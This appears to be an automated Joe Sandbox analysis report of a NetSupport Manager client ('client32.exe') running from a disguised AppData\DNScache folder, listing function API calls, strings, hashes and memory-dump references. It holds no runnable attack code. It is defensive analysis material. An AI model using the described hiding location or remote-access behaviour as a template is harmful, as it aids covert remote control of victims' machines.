Opcode Fuzzy Hash: 79d1fb3316b6a809dc4fbc7e172a240c417b5edfee08efaec5b4f9c643edd506
Instruction Fuzzy Hash: 1011E2F1D00615ABD720CF99C804B0BFBEDEB40654F104A2FE42AD3740E731F9008A92

Function 11141CB0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 51COMMON

Download Yara Rule

APIs

Part of subcall function 11140F70: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11190A88), ref: 11140FDD
Part of subcall function 11140F70: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110C55B), ref: 1114101E
Part of subcall function 11140F70: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1114107B

wsprintfA.USER32 ref: 11141CDE
wsprintfA.USER32 ref: 11141CF4

Part of subcall function 1113F5D0: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1110C55B,76938400,?), ref: 1113F667
Part of subcall function 1113F5D0: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 1113F687
Part of subcall function 1113F5D0: CloseHandle.KERNEL32(00000000), ref: 1113F68F

Strings

NSM.LIC, xrefs: 11141CC3
%sNSA.LIC, xrefs: 11141CEE
%sNSM.LIC, xrefs: 11141CD8

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: File$CreateFolderPathwsprintf$CloseHandleModuleName
String ID: %sNSA.LIC$%sNSM.LIC$NSM.LIC
API String ID: 3779116287-2600120591
Opcode ID: 10fe353150c4a136d96217364119d928f9420d5936b08755f188faef03f110a2
Instruction ID: ca00207c866dad099f8e7963b495b36a258e6deebbd3cdc666715a5fa7ef61fb
Opcode Fuzzy Hash: 10fe353150c4a136d96217364119d928f9420d5936b08755f188faef03f110a2
Instruction Fuzzy Hash: 2E01D876E0522D66CB50DFF18C41BDFF76C8F44608F100195FC0997184EE307A448792

Function 1113F5D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1110C55B,76938400,?), ref: 1113F667
CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 1113F687
CloseHandle.KERNEL32(00000000), ref: 1113F68F

Strings

", xrefs: 1113F61E

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CreateFile$CloseHandle
String ID: "
API String ID: 1443461169-123907689
Opcode ID: 0514b85a4bb7f076a42cb2970b1ad491c72ec6c51329d6f3be7243a02cb64eac
Instruction ID: 008e4aca3803944ade0234e08cae1ccadc2d9757611747833c98392c386e5654
Opcode Fuzzy Hash: 0514b85a4bb7f076a42cb2970b1ad491c72ec6c51329d6f3be7243a02cb64eac
Instruction Fuzzy Hash: 6821DD70A0425BAFE312CE38DD60BD9BBA49F82325F2041E4F8D5DB1D5DA709A49C753

Function 6C3C6610 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84networkCOMMON

Download Yara Rule

APIs

Part of subcall function 6C3D9BF0: _strncpy.LIBCMT ref: 6C3D9C14

inet_addr.WSOCK32(?,?,?,?,?,?,00002000,?,00000000), ref: 6C3C6691
gethostbyname.WSOCK32(?,?,?,?,?,?,00002000,?,00000000), ref: 6C3C66A2
WSAGetLastError.WSOCK32(?,?,?,?,?,?,00002000,?,00000000), ref: 6C3C66CD

Strings

Cannot resolve hostname %s, error %d, xrefs: 6C3C66D6

Memory Dump Source

Source File: 00000004.00000002.4575810367.000000006C3C1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C3C0000, based on PE: true

Associated: 00000004.00000002.4575794801.000000006C3C0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575839994.000000006C400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575856135.000000006C409000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575870135.000000006C40A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575870135.000000006C40E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575904976.000000006C410000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c3c0000_client32.jbxd

Yara matches

Similarity

API ID: ErrorLast_strncpygethostbynameinet_addr
String ID: Cannot resolve hostname %s, error %d
API String ID: 2603238076-1802540647
Opcode ID: 2d293536bd9a1f0be9e7c7e10299f3fcf62215b508426b76b67c6e2c33571266
Instruction ID: 5f6e00f5d6caf8870137811dea032696f474f18abdacf0301900a2cf8b2bc068
Opcode Fuzzy Hash: 2d293536bd9a1f0be9e7c7e10299f3fcf62215b508426b76b67c6e2c33571266
Instruction Fuzzy Hash: 8B219431A002189BDB10DF64CC40BEEB3B8BF48214F40859AE989D7680EF31D958CFA2

Function 1102CCC0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 1105D350: __wcstoi64.LIBCMT ref: 1105D38D

SetEvent.KERNEL32(?,Client,DisableGeolocation,00000000,00000000,33E68B52,76232EE0,?,00000000,Function_0017AC6B,000000FF,?,1102FA76,UseIPC,00000001,00000000), ref: 1102CD77

Part of subcall function 1110C4B0: _malloc.LIBCMT ref: 1110C4C9
Part of subcall function 1110C4B0: wsprintfA.USER32 ref: 1110C4E4
Part of subcall function 1110C4B0: _memset.LIBCMT ref: 1110C507

Part of subcall function 1110C580: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,7736C3F0,?,1110D2DD,00000000,00000001,?,?,?,?,?,110309CC), ref: 1110C59E

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 1102CD3A

Strings

DisableGeolocation, xrefs: 1102CCEE
Client, xrefs: 1102CCF3

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Event$Create$__wcstoi64_malloc_memsetwsprintf
String ID: Client$DisableGeolocation
API String ID: 3315423714-4166767992
Opcode ID: 457abe30f3de02040d1b28d5f90f19654e2b307dceb214312a3db8a1adb2d9eb
Instruction ID: 576321ab2be76ec1cc6503dcb72392ce386cc46ff2937fd65140f52b3eceb142
Opcode Fuzzy Hash: 457abe30f3de02040d1b28d5f90f19654e2b307dceb214312a3db8a1adb2d9eb
Instruction Fuzzy Hash: 5C21A274A41751ABE321CB94CE41B6AFBA4E708B08F104269EA15AB3C0D7B57400CB84

Function 11026DC0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53windowCOMMON

Download Yara Rule

APIs

GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11026DEA

Part of subcall function 110CBC30: EnterCriticalSection.KERNEL32(00000000,00000000,76933760,00000000,7694A1D0,1105D2FB,?,?,?,?,11026153,00000000,?,?,00000000), ref: 110CBC4B
Part of subcall function 110CBC30: SendMessageA.USER32(00000000,00000476,00000000,00000000), ref: 110CBC78
Part of subcall function 110CBC30: SendMessageA.USER32(00000000,00000475,00000000,?), ref: 110CBC8A
Part of subcall function 110CBC30: LeaveCriticalSection.KERNEL32(?,?,?,?,11026153,00000000,?,?,00000000), ref: 110CBC94

TranslateMessage.USER32(?), ref: 11026E00
DispatchMessageA.USER32(?), ref: 11026E06

Strings

Exit Msgloop, quit=%d, xrefs: 11026E3D

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$CriticalSectionSend$DispatchEnterLeaveTranslate
String ID: Exit Msgloop, quit=%d
API String ID: 3212272093-2210386016
Opcode ID: ad62df4f6a177287a26eb3aeeeb4ef6fd92fe6a01e84c9031917bab1664ab4e6
Instruction ID: d3db80ed1f2384e6355ac209f3b858468c83afcfc05be401cfa1999254397b42
Opcode Fuzzy Hash: ad62df4f6a177287a26eb3aeeeb4ef6fd92fe6a01e84c9031917bab1664ab4e6
Instruction Fuzzy Hash: BA012473E0121E26EB11EAE49C81FAFB3AC5B44708FD040A5EE14E7185E761B010C7A2

Function 11017640 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 1101764D

Part of subcall function 11017550: WaitForSingleObject.KERNEL32(00000314,000000FF), ref: 1101758C
Part of subcall function 11017550: CoInitialize.OLE32(00000000), ref: 11017595
Part of subcall function 11017550: _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 110175BC
Part of subcall function 11017550: CoUninitialize.COMBASE ref: 11017620

Part of subcall function 11017470: WaitForSingleObject.KERNEL32(00000314,000000FF), ref: 110174A2
Part of subcall function 11017470: CoInitialize.OLE32(00000000), ref: 110174AB
Part of subcall function 11017470: _GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 110174D2
Part of subcall function 11017470: CoUninitialize.COMBASE ref: 11017530

SetEvent.KERNEL32(00000314), ref: 1101766D
GetTickCount.KERNEL32 ref: 11017673

Strings

touchkbd, systype=%d, chassis=%d, took %d ms, xrefs: 1101767D

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountInitializeObjectSingleStringTickUninitializeW@16Wait$Event
String ID: touchkbd, systype=%d, chassis=%d, took %d ms
API String ID: 3804766296-4122679463
Opcode ID: 7c0e217cac6ad692df6fe3b4bd587e1beadc8a543886d5bfbbd8a1ac4904fbce
Instruction ID: 3f66c20402e593fa0d6c73e7bcd0eef763e37385d1a6c82da5c1e0c8f0d08e1d
Opcode Fuzzy Hash: 7c0e217cac6ad692df6fe3b4bd587e1beadc8a543886d5bfbbd8a1ac4904fbce
Instruction Fuzzy Hash: 57F0A7B5E102186BE700DBF99C89D6EBB9CD744359B000075F904D7245E9B2BD1047B1

Function 6C3C4FB0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 6C3C4FC4
K32EnumProcessModules.KERNEL32(00000FA0,?,00000000,6C3C8E0D,00000000,?,6C3C8E0D,00000000,?,00000FA0,?), ref: 6C3C4FE4
SetLastError.KERNEL32(00000078,00000000,?,6C3C8E0D,00000000,?,00000FA0,?), ref: 6C3C4FED

Strings

EnumProcessModules, xrefs: 6C3C4FBE

Memory Dump Source

Source File: 00000004.00000002.4575810367.000000006C3C1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C3C0000, based on PE: true

Associated: 00000004.00000002.4575794801.000000006C3C0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575839994.000000006C400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575856135.000000006C409000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575870135.000000006C40A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575870135.000000006C40E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575904976.000000006C410000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c3c0000_client32.jbxd

Yara matches

Similarity

API ID: AddressEnumErrorLastModulesProcProcess
String ID: EnumProcessModules
API String ID: 3858832252-3735562946
Opcode ID: dd9dfb9839141f64411524188fab4b1204a22c36cd240a2ef5bea87f06c0f822
Instruction ID: 2e517dba5b559c660b2ab90fd9367fd99c2328ecdbca573a751a97ee69182f72
Opcode Fuzzy Hash: dd9dfb9839141f64411524188fab4b1204a22c36cd240a2ef5bea87f06c0f822
Instruction Fuzzy Hash: A9F05872744268AFC724DFA4E844EAB77A8EB48721F00C91AF95A97640C771E810CFA0

Function 6C3C5000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 6C3C5014
K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,6C3C8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6C3C5034
SetLastError.KERNEL32(00000078,00000000,?,6C3C8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6C3C503D

Strings

GetModuleFileNameExA, xrefs: 6C3C500E

Memory Dump Source

Source File: 00000004.00000002.4575810367.000000006C3C1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C3C0000, based on PE: true

Associated: 00000004.00000002.4575794801.000000006C3C0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575839994.000000006C400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575856135.000000006C409000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575870135.000000006C40A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575870135.000000006C40E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575904976.000000006C410000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c3c0000_client32.jbxd

Yara matches

Similarity

API ID: AddressErrorFileLastModuleNameProc
String ID: GetModuleFileNameExA
API String ID: 4084229558-758377266
Opcode ID: 6a9b0db68adf38a1ddc0f0f62b0f95ff551c0b558e23ff87ce2b471ad2511023
Instruction ID: ed0c4da42cc2b9d2e36a1d998cd71abe5d408b73bdd3e30430dcbcab4d83b550
Opcode Fuzzy Hash: 6a9b0db68adf38a1ddc0f0f62b0f95ff551c0b558e23ff87ce2b471ad2511023
Instruction Fuzzy Hash: B5F05E72740228ABC720DF94E804F9B77B8EB48710F00491AF946D7640C671E810DBB1

Function 11134DF0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27threadCOMMON

Download Yara Rule

APIs

Part of subcall function 1105D350: __wcstoi64.LIBCMT ref: 1105D38D

CreateThread.KERNEL32(00000000,00001000,Function_00134C30,00000000,00000000,11135E02), ref: 11134E2E
CloseHandle.KERNEL32(00000000,?,11135E02,AutoICFConfig,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 11134E35

Strings

*AutoICFConfig, xrefs: 11134E07
Client, xrefs: 11134E0C

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseCreateHandleThread__wcstoi64
String ID: *AutoICFConfig$Client
API String ID: 3257255551-59951473
Opcode ID: b708feff77d6696842c2c20f7c2535151044f4b5f2031e6a83c777a15fd76c61
Instruction ID: 5226e41c63e7dbc6a25db253a66347c6ee290d5013a6a6822523c322580964b9
Opcode Fuzzy Hash: b708feff77d6696842c2c20f7c2535151044f4b5f2031e6a83c777a15fd76c61
Instruction Fuzzy Hash: 71E0D8347902687EF7218AE28D46F58F3589744B67F500224F721650C8D6A460408739

Function 1106FDD0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 134sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000000FA), ref: 1106FE27
EnterCriticalSection.KERNEL32(?), ref: 1106FE34
LeaveCriticalSection.KERNEL32(?), ref: 1106FF06

Strings

Push, xrefs: 1106FDF6

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeaveSleep
String ID: Push
API String ID: 1566154052-4278761818
Opcode ID: cad264493a76cf8897b056fb152748673e7475aa123ee569e8f848ac225aecfd
Instruction ID: 8dfa3cba5bf0fbc25463c0c24587327a5cb7f90c02eb138dd624edcf4d299a63
Opcode Fuzzy Hash: cad264493a76cf8897b056fb152748673e7475aa123ee569e8f848ac225aecfd
Instruction Fuzzy Hash: 5051CB75E00341DFE721CF64C894B56FBE9AF08718F45859DE86A8B282D730F944CB92

Function 6C3C5C90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

ioctlsocket.WSOCK32(93BF34B3,4004667F,00000000,a3=l), ref: 6C3C5D1F
select.WSOCK32(00000001,?,00000000,?,00000000,93BF34B3,4004667F,00000000,a3=l), ref: 6C3C5D62

Strings

a3=l, xrefs: 6C3C5D0E

Memory Dump Source

Source File: 00000004.00000002.4575810367.000000006C3C1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C3C0000, based on PE: true

Associated: 00000004.00000002.4575794801.000000006C3C0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575839994.000000006C400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575856135.000000006C409000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575870135.000000006C40A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575870135.000000006C40E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575904976.000000006C410000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c3c0000_client32.jbxd

Yara matches

Similarity

API ID: ioctlsocketselect
String ID: a3=l
API String ID: 1457273030-2854187390
Opcode ID: 3bf781cd25daa5bfcf4b96bbba979185f4233fa216d4d4dc8c5b9d09520ac840
Instruction ID: 45bb407c0ff8ec3da8548509d8036eb913de49a75ec4c5fc594a971c556dd56b
Opcode Fuzzy Hash: 3bf781cd25daa5bfcf4b96bbba979185f4233fa216d4d4dc8c5b9d09520ac840
Instruction Fuzzy Hash: E8213071A003188BEB28DF14C958BEDB7B9EF48304F0081DAA80D97681DB715F98DF91

Function 1113FFC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(110290EF,?,11140213,?), ref: 1113FFCC
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\DNScache\client32.exe,00000104,?,11140213,?), ref: 1113FFE9

Strings

C:\Users\user\AppData\Local\DNScache\client32.exe, xrefs: 1113FFD4, 1113FFE2

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
